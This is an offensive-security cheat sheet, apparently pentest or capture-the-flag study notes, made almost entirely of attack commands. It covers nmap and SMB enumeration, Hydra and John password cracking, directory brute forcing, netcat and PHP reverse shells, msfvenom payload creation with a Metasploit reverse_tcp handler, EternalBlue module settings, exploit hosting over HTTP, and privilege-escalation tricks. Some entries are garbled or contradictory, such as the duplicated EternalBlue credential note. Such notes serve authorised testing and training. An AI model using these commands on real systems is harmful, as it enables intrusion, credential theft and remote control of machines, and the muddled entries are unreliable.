Nmap, Netcat, and Metasploit Commands Cheat Sheet

Classified in Computers

Written at on English with a size of 7.67 KB.

Nmap Options

-PE: Quickly check if host is up.

-sn: Disable port scanning (host discovery).

-n: Disables DNS resolution (checks IP online without looking up hostnames).

-O: OS detection.

-A: OS detection, Version detection, Script scanning, traceroute.

-sV: Service detection (banner info, version).

-vV: Provides verbose output.

-sC: Scan with default scripts for additional info gathering.

--min-rate=5000: Ensures scan sends at least 5k packets per second.

nmap --script smb-enum-shares.nse -p 445 (ip): List shares and their properties.

To see scripts starting with X: ls /path/X

To execute script with script tracing: sudo nmap -script=smb-os-discovery -script-trace target_ip

To enumerate the SMB share files: sudo nmap -script=smb-enum-shares target_ip

Vulnerability scanning on port 445: sudo nmap -script=smb-vuln-* -p 445 target_ip

Netcat Commands

nc -z site.com: Port scan of specified website or server.

nc -l: Instruct local system to listen for TCP connections & UDP activity on specified port number.

nc site.com 1234 < file_name: Initiate transfer of a file based on specified port number.

Printf: Save HTML code and publish it through local server.

-u: UDP, -v: verbose, -p: specify port, -D: turn off full debug mode, -n: skip DNS lookups.

-nv (ip) (port): Remote shell approach.

nc -l -p [port] -e relay.bat: Connect to relay.

> filename.out: to output into a file, < filename.in: receive a file in.

echo "" | nc -zv -wl [host] [port range]: Obtain the TCP banners for a range of ports.

PHP Reverse Shell

For reverse shell with PHP:

  1. Download PHP reverse shell and put in share.
  2. Set up listener nc -lvp 4444.
  3. Access web page with PHP stuff at the end ?stuff.

SSH, DNS, and File Transfer

SSH login: ssh (username)@(target IP)

DNS lookup: dig axfr (target domain) @(target IP)

scp (file) <userid>@<victim IP address>:/home/friend: Transfer file to the machine to the "friend" account.

chmod +x file: To change the file permissions to make it executable.

SMB Client

(If Nmap says something about SMB):

Listing Shares: smbclient -L (ip address)

Connecting to Share: smbclient //(ip)/(share) -U (username)

Enumerates SMB shares and info on target Windows system: enum4linux -S (target IP)

Enumerates SMB shares and their permissions: crackmapexec smb -u '' -p '' --shares

RDP Exploit: xfreerdp /u:<userid> /p:<password> /v:<IP Address>

Password Cracking

John the Ripper: john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 (file)

Hydra: sudo hydra -l (username) -P /usr/share/wordlists/rockyou.txt (target IP) https-post-form "/:username=admin&password=^PASS^:Wrong Credentials"

https-post-form: Specifies target form for brute-forcing.

Directory Scanning

(May have to add directories to /etc/config file first)

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[IP]/FUZZ

gobuster dir -u (target address) -x (extension) -w /usr/share/wordlists/dirb/common.txt -t 50

feroxbuster -url (target IP)

Hosting and Transferring Exploits

Hosting a HTTP server to bring exploits over: python3 -m http.server 8000

Bringing exploit over to a shell: curl -o C:\(path to desktop)


Creating Payload

msfvenom -p [PAYLOAD] lhost=[LHOST] lport=[LPORT] -f [FORMAT] -o [FILENAME].exe

Setting up Listener

msfconsole ; use exploit/multi/handler ; set payload (operating system)/(system type(x64/x86)/meterpreter/reverse_tcp ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; run

Suggests potential exploits: use exploit suggester


(Requires SMB user and pass unlike EternalBlue):

msfconsole ; search the exploit ; use 0 (windows/smb/ms17_010_psexec) ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; set SMBPass (Password) ; Set SMBUser (Username) ; getuid: NT AUTHORITY\SYSTEM


(Requires SMB user and pass unlike EternalBlue)

msfconsole ; use windows/smb/ms17_010_eternalblue ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker)

winPEAS enumeration (Look for red herrings): https://github.com/peass-ng/PEASS-ng/releases/tag/20250202-a3a1123d

Post Exploitation

Full TTY Shell

Spawns better interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

Restores terminal behaviour for better control: stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Searches for SUID binaries, can be exploited for privilege escalation: find / -perm /6000 2>/dev/null

Evil-WinRM (Connects to Windows machine using Windows Remote Management): evil–winrm -S -i -u [username] -p [password]

CrackMapExec: For enumerating and attacking Windows network

Database Enumeration


mysql -u username -p ; show databases; select * from tables; show tables; show create table [x]; (Reveals table schema)


db.getCollection(‘flag’).find(): Retrieve data from “Flag” collection

db.getCollection(‘ecommerceWebapp’).find({‘id’:2}): Queries “ecommerceWebapp” collection for specific entry

db.ecommerceWebapp.getIndexes(); = Lists indexes in collection

Security Checks

Steven Goh’s book of hiding tricks: (Windows)

View PowerShell history: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Common security checks: wsl installation, public user, guest user, SMB shares, FTP anonymous login

(Linux): Check home directories, webapp configs, SUID binaries, mail, Git repositories and uncommon services and open ports

Lists allowed commands for user: (Potential privilege escalation) sudo -l (with password) ; 7z x (filename) -p(Password)

Shell Commands

groups = See which groups user part of

cat = Write out the contents

pwd = Check current path

docker images = Check info about dockers

docker run -it --privileged --rm peeps-web /bin/bash = Docker image privilege escalation


Base64 Decoding: base64 -d [string] or echo -e 'string' | base64 -d; echo;

Get-Acl -Path C:/inetpub | Format-Table -Wrap

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